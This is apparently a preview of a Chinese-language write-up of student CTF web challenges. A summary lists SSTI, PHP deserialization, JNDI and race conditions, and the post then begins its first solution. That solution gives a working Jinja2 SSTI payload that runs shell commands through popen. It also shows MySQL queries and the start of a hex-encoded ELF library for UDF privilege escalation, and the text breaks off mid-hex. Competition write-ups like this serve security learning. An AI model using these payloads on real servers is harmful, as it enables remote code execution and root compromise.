主要观点总结
这是一份关于解决一系列网络安全挑战的总结,包括使用特定工具和技术来绕过安全限制、利用漏洞、获取权限等。
关键观点总结
关键观点1: 个人赛挑战
题目涉及Web安全、PHP反序列化、JNDI、条件竞争等概念,需要利用特定漏洞和技巧来解决问题。
关键观点2: Web安全挑战
通过利用Web应用程序中的漏洞,如SSTI、条件竞争、文件包含等,进行攻击和权限提升。
关键观点3: PHP反序列化
利用PHP反序列化漏洞,通过修改序列化数据来执行任意代码,进而获取权限。
关键观点4: JNDI利用
通过JNDI(Java Naming and Directory Interface)进行攻击,利用Java应用程序的命名和目录服务来执行恶意代码。
关键观点5: 条件竞争
通过创建条件竞争,利用应用程序的并发处理来执行恶意操作或绕过安全限制。
关键观点6: 绕过安全限制
使用各种技巧和方法来绕过应用程序的安全措施,如过滤、权限校验等,以实现攻击目的。
文章预览
1. 前言 个人赛,参赛的主要都是学生,不是特别卷。因为web比较有意思,AWDP也有三道是web。虽然有的题没解出来,但除了MyCMS没时间碰,其他基本都摸的差不多了。 2. brother 本来是最难的一道题,但因为出题者没有正确的限制mysql的文件读写权限导致被偷鸡。 一眼SSTI /?name={{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ps aux').read()}} 本来是很难的多层权限提权题目,但看到mysql是root权限启动后就觉得可以偷。 api.py里有mysql账户密码,而且ctf是root权限,且secure_file_priv为空。一眼udf提权,直接掏出珍藏多年的linux udf脚本搞定。 show global variables like '%secure_file_priv%'; show variables like '%plugin%'; select * from func; select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000
………………………………